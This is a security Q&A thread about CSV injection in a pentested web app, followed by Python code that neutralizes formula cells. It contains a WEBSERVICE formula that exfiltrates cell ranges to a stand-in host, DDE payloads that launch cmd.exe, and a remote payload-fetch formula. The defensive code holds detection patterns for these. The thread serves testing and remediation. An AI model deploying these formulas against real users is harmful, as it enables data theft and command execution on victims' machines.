9

I'm currently pentesting a web application on which a user can generate a CSV. I managed to exfiltrate data via CSV injection using a payload such as:

=WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50)))

I am now trying to create a "more dangerous" payload and I see a lot of references online using something such as:

=cmd|' /C calc'!A0

However, I can't find a way to have such a payload trigger; I always get a #REF! error. Is this kind of attack still feasible in 2020? Or did Microsoft implement a mitigation for those attacks?

I'm running Excel for Office 365 version 1902.

Scaum
2 Answers

7

Finally found the reason why the payloads were not executing: DDE launch was disabled in Excel options.

If someone has the same issue, this setting can be found in

File → Options → Trust Center → Trust Center Settings → External Content → Enable Dynamic Data Exchange Server Launch

Reference: https://docs.microsoft.com/en-us/office365/troubleshoot/security/security-settings

schroeder
Scaum

0

I haven't tested this, but it might be possible to get this to run using the WEBSERVICE function. According to Microsoft, you can update cells with the function; combining that with this Mimecast article, it appears you could load your malicious "cell-code" using this function.

It would look something like this:

=WEBSERVICE("http://example.com/payload.txt")

Where payload.txt contains:

=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c calc.exe'!''

Payload courtesy of PentestLab Blog, so not sure if it still executes the same way.

  • Hi Blaise, thanks for your answer. I understand the concept of loading the payload using the WEBSERVICE function; my issue is more about creating the payload. If I paste the code from PentestLab in my Excel, I only get a #REF! error and no code execution :( – Scaum Feb 14 '20 at 14:05
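
For the remediation side of this finding, here is an added example (not part of the original posts) of how the application's CSV export could neutralize the cell values discussed in this thread before writing them. The function names and sample rows are assumptions made for illustration; the list of trigger characters follows OWASP's CSV injection guidance.

```python
import csv
import io
import re

# Leading characters that make a spreadsheet evaluate a cell as a formula
# (list taken from OWASP's CSV injection guidance).
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")

# DDE-style reference, app|'topic'!item: the shape of the cmd| and MSEXCEL| cells above.
DDE_SHAPE = re.compile(r"^[=+\-@]\s*[\w.]+\s*\|.*!", re.S)
EXTERNAL_FETCH = re.compile(r"\bWEBSERVICE\s*\(", re.I)


def classify(cell: str) -> str:
    """Label a cell for logging: 'dde', 'external-fetch', 'formula' or 'plain'."""
    if not cell.startswith(FORMULA_TRIGGERS):
        return "plain"
    if DDE_SHAPE.match(cell):
        return "dde"
    if EXTERNAL_FETCH.search(cell):
        return "external-fetch"
    return "formula"


def neutralize(cell: str) -> str:
    """Prefix a single quote so the spreadsheet treats the value as text.
    Trade-off: legitimate values such as negative numbers are exported as text too."""
    return "'" + cell if cell.startswith(FORMULA_TRIGGERS) else cell


def export_csv(rows) -> str:
    """Write rows with every field quoted and every formula-like field neutralized."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL)
    for row in rows:
        writer.writerow([neutralize(str(value)) for value in row])
    return buf.getvalue()


# Constructed sample rows: user-controlled values as they might sit in the database.
SAMPLE_ROWS = [
    ["alice", "alice@example.com", "-42"],
    ["bob", '=WEBSERVICE(CONCAT("http://example.com/", CONCAT(A1:A50)))', "7"],
    ["carol", "=cmd|' /C calc'!A0", "3"],
]

if __name__ == "__main__":
    for row in SAMPLE_ROWS:
        print([classify(v) for v in row])
    print(export_csv(SAMPLE_ROWS))
```

Neutralizing at export time protects users regardless of their Trust Center settings, whereas the DDE launch option from the accepted answer only covers the `cmd|`-style cells and not the WEBSERVICE exfiltration.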